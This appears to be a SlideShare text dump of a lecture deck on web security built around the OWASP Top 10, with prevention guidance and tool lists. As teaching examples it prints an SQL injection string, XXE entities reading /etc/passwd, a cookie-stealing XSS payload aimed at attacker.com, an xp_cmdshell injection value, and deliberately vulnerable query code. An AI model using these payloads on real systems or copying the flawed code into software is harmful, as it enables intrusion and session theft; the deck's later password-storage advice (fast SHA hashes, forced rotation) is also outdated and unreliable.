SlideShare a Scribd company logo

Web security uploadv1

S
Setia Juli Irzal Ismail

Guest Lecture at University Autonoma Barcelona about web security

Education
1 of 103
Download to read offline
Web Security A guide to securing your web Setia Juli Irzal Ismail ID-CERT – Telkom University
Content • Introduction • Web Security Case • OWASP Top 10 • Basic Web Security Standard • Web Security Technology • Discussion
Introduction • Setia Juli Irzal Ismail • Jul Ismail • Malware Analyst – ID-CERT • Lecturer – Telkom University www.cert.or.id/
ID-CERT • Indonesia Computer Emergency Response Team • 1998 – Dr. Budi Rahardjo • Community based • Incident Handling • Malware Lab • Research & Training about Malware • Tools: Malware Scanner • Founder AP-CERT: JP-CERT & AusCERT www.cert.or.id/
Web Security
• 30,000 websites are hacked everyday • hundred of free tools available in internet for hacking a website • 70% attack come through web app • Web vulnerability www.cert.or.id/
• SQL injection sony attack LulzSec • Leaked 77 million user data • 1 month shutdown • $171 million
• CSS vulnerability Android Market • Allow attacker to remotely install apps onto user android device www.cert.or.id/
We Are Secure, We Have a Firewall • Myth about Firewall • Closed off ports
Impact • Deface • Install malware, botnet • Take over
Causes • inexperience programmers www.cert.or.id/
OWASP
Owasp top 10 • Open Web Application Security Project • Open souce project à improving web application security • Individual Contributor, Company Sponsor, Volunteer • Secure Coding, library • Tools, scanner, vulnerable lab • Top Ten List
OWASP Top Ten • 2004 • 2007 • 2010 • 2013 • 2017 www.cert.or.id/
1. Injection OWASP Top 10
1. Injection • SQL, LDAP, XPath, or NoSQL queries, OS commands, XML parsers, SMTP headers, expression languages, and ORM queries. • occur when untrusted data is sent to an interpreter as part of a command or query. • The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization
Injection • Injection flaws are easy to discover when examining code. • Scanners and fuzzers can help attackers find injection flaws. • Injection can result in data loss, corruption, or disclosure to unauthorized parties, loss of accountability, or denial of access. • Injection can sometimes lead to complete host takeover. www.cert.or.id/
An application is vulnerable to attack when ? • User-supplied data is not validated, filtered, or sanitized by the application. • Dynamic queries or non-parameterized calls without context- aware escaping are used directly in the interpreter. • Hostile data is used within object-relational mapping (ORM) search parameters to extract additional, sensitive records. • Hostile data is directly used or concatenated, such that the SQL or command contains both structure and hostile data in dynamic queries, commands, or stored procedures.
Defense • Source code review • automated testing of all parameters, headers, URL, cookies, JSON, SOAP, and XML data inputs • static source (SAST) and dynamic application test (DAST) tools into the CI/CD pipeline www.cert.or.id/
How to Prevent • use a safe API • avoids the use of the interpreter entirely or provides a parameterized interface, or migrate to use Object Relational Mapping Tools (ORMs) • Use positive or "whitelist" server-side input validation. • For any residual dynamic queries, escape special characters using the specific escape syntax for that interpreter. • Use LIMIT and other SQL controls within queries to prevent mass disclosure of records in case of SQL injection.
Example Attack Scenarios • Scenario #1: An application uses untrusted data in the construction of the following vulnerable SQL call: • String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"; • Scenario #2: Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g. Hibernate Query Language (HQL)): • Query HQLQuery = session.createQuery("FROM accounts WHERE custID='" + request.getParameter("id") + "'"); www.cert.or.id/
Attack • In both cases, the attacker modifies the ‘id’ parameter value in their browser to send: ' or '1'='1. For example: • http://example.com/app/accountView?id=' or '1'='1 • This changes the meaning of both queries to return all the records from the accounts table. • More dangerous attacks could modify or delete data, or even invoke stored procedures.
2. Broken Authentication OWASP Top 10
2. Broken Authentication • Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force, and dictionary attack tools. • Session management attacks are well understood, particularly in relation to unexpired session tokens. • The prevalence of broken authentication is widespread due to the design and implementation of most identity and access controls. • Session management is the bedrock of authentication and access controls, and is present in all stateful applications. www.cert.or.id/
Broken Authentication • Attackers can detect broken authentication using manual means • Exploit them using automated tools with password lists and dictionary attacks. • Attackers have to gain access to only a few accounts, or just one admin account to compromise the system. • Depending on the domain of the application, this may allow money laundering, social security fraud, and identity theft, or disclose legally protected highly sensitive information.
Is the Application Vulnerable? • Permits automated attacks such as credential stuffing, where the attacker has a list of valid usernames and passwords. • Permits brute force or other automated attacks. • Permits default, weak, or well known passwords, such as "Password1" or "admin/admin“. • Uses weak or ineffective credential recovery and forgot- password processes, such as "knowledge-based answers", which cannot be made safe. www.cert.or.id/
Broken Authentication Vulnerable • Uses plain text, encrypted, or weakly hashed passwords (see A3:2017-Sensitive Data Exposure). • Has missing or ineffective multi-factor authentication. • Exposes Session IDs in the URL (e.g., URL rewriting). • Does not rotate Session IDs after successful login. • Does not properly invalidate Session IDs. User sessions or • authentication tokens (particularly single sign-on (SSO) tokens) aren’t properly invalidated during logout or a period of inactivity.
How to Prevent • Multi-factor authentication to prevent automated, credential stuffing, brute force, and stolen credential re-use attacks. • Do not ship or deploy with any default credentials, particularly for admin users. • Implement weak-password checks, such as testing new or changed passwords against a list of the top 10000 worst passwords. www.cert.or.id/
Defense • Align password length, complexity and rotation policies • NIST 800-63 B's guidelines in section 5.1.1 for Memorized Secrets or other modern, evidence based password policies. • Ensure registration, credential recovery, and API pathways are hardened against account enumeration attacks by using the same messages for all outcomes. • Limit or increasingly delay failed login attempts. Log all failures and alert administrators when credential stuffing, brute force, or other attacks are detected. • Use a server-side, secure, built-in session manager that generates a new random session ID with high entropy after login. Session IDs should not be in the URL, be securely stored and invalidated after logout, idle, and absolute timeouts.
Example Attack Scenarios • Scenario #1: Credential stuffing, the use of lists of known passwords, is a common attack. • If an application does not implement automated threat or credential stuffing protections, the application can be used as a password oracle to determine if the credentials are valid. • Scenario #2: Most authentication attacks occur due to the continued use of passwords as a sole factor. • Once considered best practices, password rotation and complexity requirements are viewed as encouraging users to use, and reuse, weak passwords. Organizations are recommended to stop these practices per NIST 800-63 and use multi-factor authentication. www.cert.or.id/
Attack • Scenario #3: Application session timeouts aren’t set properly. • A user uses a public computer to access an application. • Instead of selecting “logout” the user simply closes the browser tab and walks away. • An attacker uses the same browser an hour later, and the user is still authenticated.
3. Sensitive Data Exposure OWASP Top 10
3. Sensitive Data Exposure • Rather than directly attacking crypto, attackers steal keys, execute man-in- the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s client, e.g. browser. • A manual attack is generally required. • Previously retrieved password databases could be brute forced by Graphics Processing Units (GPUs) • The most common flaw is simply not encrypting sensitive data. • When crypto is employed, weak key generation and management, and weak algorithm, protocol and cipher usage is common, particularly for weak password hashing storage techniques. www.cert.or.id/
Sensitive Data Exposure • For data in transit, server side weaknesses are mainly easy to detect, but hard for data at rest. • Failure frequently compromises all data that should have been protected. • Typically, this information includes sensitive personal information (PII) data such as health records, credentials, personal data, and credit cards,
Is the Application Vulnerable? • Is any data transmitted in clear text? • HTTP, SMTP, and FTP. • External internet traffic is especially dangerous. Verify all internal traffic e.g. between load balancers, web servers, or back-end systems. • Is sensitive data stored in clear text, including backups? • Are any old or weak cryptographic algorithms used? www.cert.or.id/
Is the Application Vulnerable? • Are default crypto keys in use, weak crypto keys generated or re-used, or is proper key management or rotation missing? • Is encryption not enforced, e.g. are any user agent (browser) security directives or headers missing? • Does the user agent (e.g. app, mail client) not verify if the received server certificate is valid?
How to Prevent • Classify data processed, stored, or transmitted by an application. Identify which data is sensitive according to privacy laws, regulatory requirements, or business needs. • Apply controls as per the classification. • Don’t store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncation. Data that is not retained cannot be stolen. • Make sure to encrypt all sensitive data at rest. • Ensure up-to-date and strong standard algorithms, protocols, and keys are in place; use proper key management. www.cert.or.id/
How to Prevent • Encrypt all data in transit with secure protocols such as TLS with perfect forward secrecy (PFS) ciphers, cipher prioritization by the server, and secure parameters. Enforce encryption using directives like HTTP Strict Transport Security (HSTS). • Disable caching for responses that contain sensitive data. • Store passwords using strong adaptive and salted hashing functions with a work factor (delay factor), such as Argon2, scrypt, bcrypt, or PBKDF2. • Verify independently the effectiveness of configuration and settings.
Example Attack Scenarios • Scenario #1: An application encrypts credit card numbers in a database using automatic database encryption. • However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. www.cert.or.id/
Scenario #2 • A site doesn't use or enforce TLS for all pages or supports weak encryption. • An attacker monitors network traffic (e.g. at an insecure wireless network), • downgrades connections from HTTPS to HTTP, • intercepts requests, and steals the user's session cookie. • The attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. Instead of the above they could alter all transported data, e.g. the recipient of a money transfer.
Scenario #3: • The password database uses unsalted or simple hashes to store everyone's passwords. • A file upload flaw allows an attacker to retrieve the password database. • All the unsalted hashes can be exposed with a rainbow table of pre- calculated hashes. • Hashes generated by simple or fast hash functions may be cracked by GPUs, even if they were salted. www.cert.or.id/
4. XML External Entity OWASP Top 10
XML External Entities (XXE) • Attackers can exploit vulnerable XML processors if • they can upload XML • include hostile content in an XML document, • exploiting vulnerable code, dependencies or integrations.
XML External Entities (XXE) • By default, many older XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. • These flaws can be used to: • extract data, • execute a remote request from the server, • scan internal systems, • perform a denial-of-service attack www.cert.or.id/
Is the Application Vulnerable? • The application accepts XML directly or XML uploads, especially from untrusted sources, or inserts untrusted data into XML documents, which is then parsed by an XML processor. • Any of the XML processors in the application or SOAP based web services has document type definitions (DTDs) enabled. As the exact mechanism for disabling DTD processing varies by processor, it is good practice to consult a reference such as the OWASP Cheat Sheet 'XXE Prevention’.
XML External Entities (XXE) • If your application uses SAML for identity processing within federated security or single sign on (SSO) purposes. SAML uses XML for identity assertions, and may be vulnerable. • If the application uses SOAP prior to version 1.2, it is likely susceptible to XXE attacks if XML entities are being passed to the SOAP framework. • Being vulnerable to XXE attacks likely means that the application is vulnerable to denial of service attacks including the Billion Laughs attack. www.cert.or.id/
How to Prevent • use less complex data formats such as JSON • avoide serialization of sensitive data. • Patch or upgrade all XML processors and libraries in use by the application or on the underlying operating system. • Use dependency checkers. • Update SOAP to SOAP 1.2 or higher. • Disable XML external entity and DTD processing in all XML parsers in the application
How to Prevent • Implement positive ("whitelisting") server-side input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes. • Verify that XML or XSL file upload functionality validates incoming XML using XSD validation or similar. • Virtual patching, API security gateways, or Web Application Firewalls (WAFs) www.cert.or.id/
Example Attack Scenarios • The attacker attempts to extract data from the server: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo> <!ENTITY xxe SYSTEM "https://192.168.1.1/private" >]> --PrivateNet <!ENTITY xxe SYSTEM "file:///dev/random" >]> -- DDoS
5. Broken Access Control OWASP Top 10
Broken Access Control • Access control enforces policy such that users cannot act outside of their intended permissions. • Manual testing is the best way to detect missing or ineffective access control, including HTTP method (GET vs PUT, etc), controller, direct object references, • attackers acting as users or administrators, or users using privileged functions, or creating, accessing, updating or deleting every record. www.cert.or.id/
Broken Access Control • Bypassing access control checks by modifying the URL, internal application state, or the HTML page, or simply using a custom API attack tool. • Allowing the primary key to be changed to another users record, permitting viewing or editing someone else's account. • Elevation of privilege. Acting as a user without being logged in, or acting as an admin when logged in as a user.
Broken Access Control • Metadata manipulation, such as replaying or tampering with a JSON Web Token (JWT) access control token or a cookie or hidden field manipulated to elevate privileges, or abusing JWT invalidation • CORS misconfiguration allows unauthorized API access. • Force browsing to authenticated pages as an unauthenticated user or to privileged pages as a standard user. Accessing API with missing access controls for POST, PUT and DELETE. www.cert.or.id/
How to Prevent • trusted server-side code or server-less API • With the exception of public resources, deny by default. • Implement access control mechanisms once and reuse them throughout the application, including minimizing CORS usage. • Model access controls should enforce record ownership, rather than accepting that the user can create, read, update, or delete any record. • Unique application business limit requirements should be enforced by domain models. •
Prevention • Disable web server directory listing and ensure file metadata (e.g. .git) and backup files are not present within web roots. • Log access control failures, alert admins when appropriate (e.g. repeated failures). • Rate limit API and controller access to minimize the harm from automated attack tooling. • JWT tokens should be invalidated on the server after logout www.cert.or.id/
Example Attack Scenarios • Scenario #1: The application uses unverified data in a SQL call that is accessing account information: • pstmt.setString(1, request.getParameter("acct")); • ResultSet results = pstmt.executeQuery( ); • An attacker simply modifies the 'acct' parameter in the browser to send whatever account number they want. If not properly verified, the attacker can access any user's account. • http://example.com/app/accountInfo?acct=notmyacct
Attack Scenario • Scenario #2: An attacker simply force browses to target URLs. • Admin rights are required for access to the admin page. • http://example.com/app/getappInfo http://example.com/app/admin_getappInfo • If an unauthenticated user can access either page, it’s a flaw. • If a non-admin can access the admin page, this is a flaw. www.cert.or.id/
6. Security Misconfiguration OWASP Top 10
Security Misconfiguration • unpatched flaws • access default accounts, • unused pages, • unprotected files and directories, etc • to gain unauthorized access or knowledge of the system.
Can happen in • network services, platform, web server, application server, database, frameworks, custom code, and pre-installed virtual machines, containers, or storage. • Automated scanners are useful for detecting misconfigurations, use of default accounts or configurations, unnecessary services, legacy options, etc. • give attackers unauthorized access to some system data or functionality. • Occasionally, such flaws result in a complete system compromise. www.cert.or.id/
Is the Application Vulnerable? • Missing appropriate security hardening across any part of the application stack, or improperly configured permissions on cloud services. • Unnecessary features are enabled or installed (e.g. unnecessary ports, services, pages, accounts, or privileges). • Default accounts and their passwords still enabled and unchanged. • Error handling reveals stack traces or other overly informative error messages to users.
Is the Application Vulnerable? • upgraded systems, latest security features are disabled or not configured securely. • The security settings in the application servers, application frameworks (e.g. Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values. • The server does not send security headers or directives or they are not set to secure values. • The software is out of date or vulnerable www.cert.or.id/
How to Prevent • A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically, with different credentials used in each environment. This process should be automated to minimize the effort required to setup a new secure environment. • A minimal platform without any unnecessary features, components, documentation, and samples. Remove or do not install unused features and frameworks.
How to Prevent • review and update the configurations appropriate to all security notes • review cloud storage permissions (e.g. S3 bucket permissions). • A segmented application architecture à separation between components or tenants, with segmentation, containerization, or cloud security groups. • Sending security directives to clients, e.g. Security Headers. • An automated process to verify the effectiveness of the configurations and settings in all environments. www.cert.or.id/
Example Attack Scenarios • Scenario #1: The application server comes with sample applications that are not removed from the production server. • These sample applications have known security flaws attackers use to compromise the server. • If one of these applications is the admin console, and default accounts weren’t changed the attacker logs in with default passwords and takes over.
Scenario #2 • Directory listing is not disabled on the server. • An attacker discovers they can simply list directories. • The attacker finds and downloads the compiled Java classes, which they decompile and reverse engineer to view the code. • The attacker then finds a serious access control flaw in the application. www.cert.or.id/
Scenario #3 • The application server’s configuration allows detailed error messages, e.g. stack traces, to be returned to users. • This potentially exposes sensitive information or underlying flaws such as component versions that are known to be vulnerable.
Scenario #4 • A cloud service provider has default sharing permissions open to the Internet by other CSP users. • This allows sensitive data stored within cloud storage to be accessed. www.cert.or.id/
7. Cross Site Scripting OWASP Top 10
Cross-Site Scripting (XSS) • Reflected XSS • DOM XSS • Stored XSS • The impact of XSS is moderate for reflected and DOM XSS, • Severe for stored XSS, • remote code execution on the victim's browser, • stealing credentials, sessions, delivering malware to the victim
Reflected XSS • The application or API includes unvalidated and unescaped user input as part of HTML output. • A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. • Typically the user will need to interact with some malicious link that points to an attacker- controlled page, such as malicious watering hole websites, advertisements, or similar. www.cert.or.id/
• Stored XSS: The application or API stores unsanitized user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk. • DOM XSS: JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, the application would not send attacker-controllable data to unsafe JavaScript APIs.
Impact • session stealing, account takeover, MFA bypass, DOM node replacement or defacement (such as trojan login panels), attacks against the user's browser such as malicious software downloads, key logging, and other client-side attacks. www.cert.or.id/
How to Prevent • Using frameworks that automatically escape XSS by design • the latest Ruby on Rails, React JS • Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities • Applying context-sensitive encoding when modifying the browser document on the client side acts against DOM XSS.
Example Attack Scenario • Scenario 1: The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: • (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>"; • The attacker modifies the ‘CC’ parameter in the browser to: • '><script>document.location= 'http://www.attacker.com/cgi- bin/cookie.cgi? foo='+document.cookie</script>'. • This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. www.cert.or.id/
Secure Coding
Principle • Input Validation • Attack Surface reduction www.cert.or.id/
Input Validation • Never Trust the User • Validate the data they input • Explicitly describe the format of a valid request input
Blacklist Validation • Make list of all invalid input à block anything on the list • Impossible to get all invalid input in the list
Whitelist Validation • List all that allowed www.cert.or.id/
Case 1 • Drop down menu & radio button • What is you favourite color? oRed oBlue oGreen • Is It safe?
• Browser à Http request à Web Application POST /color.php HTTP/1.1 Host: www.example.xxx Content-Length:27 Content-Type: application/x-www-form-urlencoded Color=Red à Attacker can modify this Color=White ; Color= ‘;Exec+xp_cmdshell+‘...‘ www.cert.or.id/
Principle of least priviledge • Only provide user with permission that allow him to accomplish what he need to do, and no more • Every new feature, add potential vulnerability • Minimize user permission • Minimize capability programming calls and object
Challenge • Microservices written in node.js and Spring Boot are replacing traditional monolithic applications. • Microservices come with their own security challenges including establishing trust between microservices, containers, secret management, etc. • Old code never expected to be accessible from the Internet is now sitting behind an API or RESTful web service to be consumed by Single Page Applications (SPAs) and mobile applications. • Architectural assumptions by the code, such as trusted callers, are no longer valid. www.cert.or.id/
Challenge • Single page applications, written in JavaScript frameworks such as Angular and React, allow the creation of highly modular feature-rich front ends. • Client-side functionality that has traditionally been delivered server- side brings its own security challenges. • JavaScript is now the primary language of the web with node.js running server side and modern web frameworks such as Bootstrap, Electron, Angular, and React running on the client.
Classifying and Prioritizing Threats • STRIDE: threat Classification system (Microsoft) • Spoofing • Tampering • Repudiation • Information Disclosure • Denial Of Service • Elevation of Priviledge www.cert.or.id/
CWE • Common Weakness Enumeration • List of software vulnerability • MITRE
Password Attack • Brute Force • Dictionary Attack www.cert.or.id/
Password Best Practice • Minimum Password Length • Enforce Password Complexity • Rotate Password (90 D) • Password Uniqueness • Password = Username? • Properly store password
Storing Password • Dont store in Plaintext • Use a strong Hash • SHA 256; SHA 512 • MD5, SHA1 • 5E884898DA28047151D0E56F8DC6292773603D0D6AABBDD62A11EF721D15 42D8 • Use Salt www.cert.or.id/
Salt • Random generated number • Added to password • 64 bit
Authentication • Password Based • Single-sign On • Multi Factor Authentication www.cert.or.id/
Authentication • Access protected resource • Session ID
Securing Authentication • SSL/TLS • Account Lockout (failed login) • Number of attempt • Window of measurement • Lockout Period • CAPTCHA (completely automated public turing test to tell Computers & Human Apart) – brute force • No Default account • Dont hard code credential • Remember me à cookies expiration www.cert.or.id/
Session Management: • sequence of network HTTP request and response transactions associated to the same user • Session Timeout (4 hours) • Idle Session Timeout (20 Minutes) • Limit the session concurrency
ACL : Access Control List • Permission • Read Write Execute www.cert.or.id/
Web Security Tecnology
Technology • Secure network • Secure Host • Application
WAF • Web Application Firewall • Filter, Monitor, block Http traffic to web application • Barracuda Network WAF • Fortinet Fortiweb • Cloudfare • Cloudbric • ModSecurity • Naxsi www.cert.or.id/
Tools – Web Scanner • Nikto • BurpSuite • Acunetix • Owasp Zap • W3af • Nessus • OpenVAS • Lynis www.cert.or.id/
Learning Material • DVWA (Damn Vulnerable Web Application) • Webgoat • Multillidae • Owasp Juice Shop • bwapp • Hackthissite • Hackthis • Altoro Mutual
Reference • Zalewski, M. (2011). The tangled Web: A guide to securing modern web applications. No Starch Press. • Sullivan, B., & Liu, V. (2011). Web application security, a beginner's guide. McGraw-Hill Education Group. • OWASP: https://www.owasp.org/index.php/Main_Page • Local Chapter: https://www.owasp.org/index.php/Catalunya • CERT Secure Coding
Terima Kasih jul [at] tass.telkomuniversity.ac.id jul_ismail Blog: julismail.staff.telkomuniversity.ac.id www.cert.or.id/

Recommended

05 wireless
05 wireless05 wireless
05 wirelessSetia Juli Irzal Ismail
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
03 keamanan password
03 keamanan password03 keamanan password
03 keamanan passwordSetia Juli Irzal Ismail
 
Logging, monitoring and auditing
Logging, monitoring and auditingLogging, monitoring and auditing
Logging, monitoring and auditingPiyush Jain
 
05 tk3193-sniffing &amp; dos
05 tk3193-sniffing &amp; dos05 tk3193-sniffing &amp; dos
05 tk3193-sniffing &amp; dosSetia Juli Irzal Ismail
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
04 sniffing
04 sniffing04 sniffing
04 sniffingSetia Juli Irzal Ismail
 
Workshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment systemWorkshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment systemDan H
 

Recommended

05 wireless
05 wireless05 wireless
05 wirelessSetia Juli Irzal Ismail
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
03 keamanan password
03 keamanan password03 keamanan password
03 keamanan passwordSetia Juli Irzal Ismail
 
Logging, monitoring and auditing
Logging, monitoring and auditingLogging, monitoring and auditing
Logging, monitoring and auditingPiyush Jain
 
05 tk3193-sniffing &amp; dos
05 tk3193-sniffing &amp; dos05 tk3193-sniffing &amp; dos
05 tk3193-sniffing &amp; dosSetia Juli Irzal Ismail
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
04 sniffing
04 sniffing04 sniffing
04 sniffingSetia Juli Irzal Ismail
 
Workshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment systemWorkshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment systemDan H
 
SQL injection
SQL injectionSQL injection
SQL injectionRaj Parmar
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]David Sweigert
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
System hacking
System hackingSystem hacking
System hackingCAS
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 
Pen test methodology
Pen test methodologyPen test methodology
Pen test methodologyCahyo Darujati
 
The Current ICS Threat Landscape
The Current ICS Threat LandscapeThe Current ICS Threat Landscape
The Current ICS Threat LandscapeDragos, Inc.
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingNetsparker
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to CybersecurityAdri Jovin
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
Secure by Design - Security Design Principles for the Working Architect
Secure by Design - Security Design Principles for the Working ArchitectSecure by Design - Security Design Principles for the Working Architect
Secure by Design - Security Design Principles for the Working ArchitectEoin Woods
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Awareness Security Session 2023 v1.0.pptx.pdf
Awareness Security Session 2023 v1.0.pptx.pdfAwareness Security Session 2023 v1.0.pptx.pdf
Awareness Security Session 2023 v1.0.pptx.pdfAbdullahKanash
 
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injectionCeh v5 module 14 sql injection
Ceh v5 module 14 sql injectionVi Tính Hoàng Nam
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Ethical hacking
Ethical hacking Ethical hacking
Ethical hacking Јаѓќеѕн Јажѕшаф
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 

More Related Content

What's hot

Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]David Sweigert
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
System hacking
System hackingSystem hacking
System hackingCAS
 
The Current ICS Threat Landscape
The Current ICS Threat LandscapeThe Current ICS Threat Landscape
The Current ICS Threat LandscapeDragos, Inc.
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingNetsparker
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to CybersecurityAdri Jovin
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
Secure by Design - Security Design Principles for the Working Architect
Secure by Design - Security Design Principles for the Working ArchitectSecure by Design - Security Design Principles for the Working Architect
Secure by Design - Security Design Principles for the Working ArchitectEoin Woods
 
Awareness Security Session 2023 v1.0.pptx.pdf
Awareness Security Session 2023 v1.0.pptx.pdfAwareness Security Session 2023 v1.0.pptx.pdf
Awareness Security Session 2023 v1.0.pptx.pdfAbdullahKanash
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 

What's hot (20)

SQL injection
SQL injectionSQL injection
SQL injection
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
System hacking
System hackingSystem hacking
System hacking
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
Pen test methodology
Pen test methodologyPen test methodology
Pen test methodology
 
The Current ICS Threat Landscape
The Current ICS Threat LandscapeThe Current ICS Threat Landscape
The Current ICS Threat Landscape
 
Sql injection
Sql injectionSql injection
Sql injection
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to Cybersecurity
 
Web application security
Web application securityWeb application security
Web application security
 
Secure by Design - Security Design Principles for the Working Architect
Secure by Design - Security Design Principles for the Working ArchitectSecure by Design - Security Design Principles for the Working Architect
Secure by Design - Security Design Principles for the Working Architect
 
Sql injection
Sql injectionSql injection
Sql injection
 
Awareness Security Session 2023 v1.0.pptx.pdf
Awareness Security Session 2023 v1.0.pptx.pdfAwareness Security Session 2023 v1.0.pptx.pdf
Awareness Security Session 2023 v1.0.pptx.pdf
 
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injectionCeh v5 module 14 sql injection
Ceh v5 module 14 sql injection
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 

Similar to Web security uploadv1

How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
